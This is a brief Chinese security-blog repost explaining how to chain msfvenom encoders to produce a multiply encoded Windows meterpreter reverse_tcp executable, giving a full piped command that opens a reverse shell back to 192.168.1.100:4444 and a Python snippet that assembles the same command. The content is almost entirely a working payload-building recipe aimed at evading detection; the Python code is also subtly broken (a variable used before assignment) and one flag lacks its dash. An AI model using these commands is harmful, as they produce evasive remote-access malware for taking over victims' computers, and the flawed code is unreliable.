msfvenom 多重编码

admin 2023年12月15日00:20:45评论40 views字数 872阅读2分54秒阅读模式

除第一次需要指定 payload 外, 其他都用 -p - 代替, 多重编码需要指定 --platform-a 并用 -f raw 输出, 最后一次编码更改为 -f exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f raw | msfvenom -p - -e x86/jmp_call_additive -i 2 -a x86 --platform windows -f raw | msfvenom -p - e x86/alpha_upper -i 1 -a x86 --platform windows -f exe > msf.exe

Python 实现

args = 'msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 '
encoders = {'x86/shikata_ga_nai': '5', 'x86/jmp_call_additive': '2', 'x86/alpha_upper': '1'}

for c in list(encoders.keys())[:-1]:
encs += '-e ' + c + ' -i ' + encoders.get(c) + ' -a x86 --platform windows -f raw | msfvenom -p - '

encs += '-e ' + list(encoders.keys())[-1] + ' -i ' + encoders.get(list(encoders.keys())[-1]) + ' -a x86  --platform windows '
args += encs + '-f exe > msf.exe'

- By:X1r0z[exp10it.cn]

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月15日00:20:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   msfvenom 多重编码http://cn-sec.com/archives/2301397.html

发表评论

匿名网友 填写信息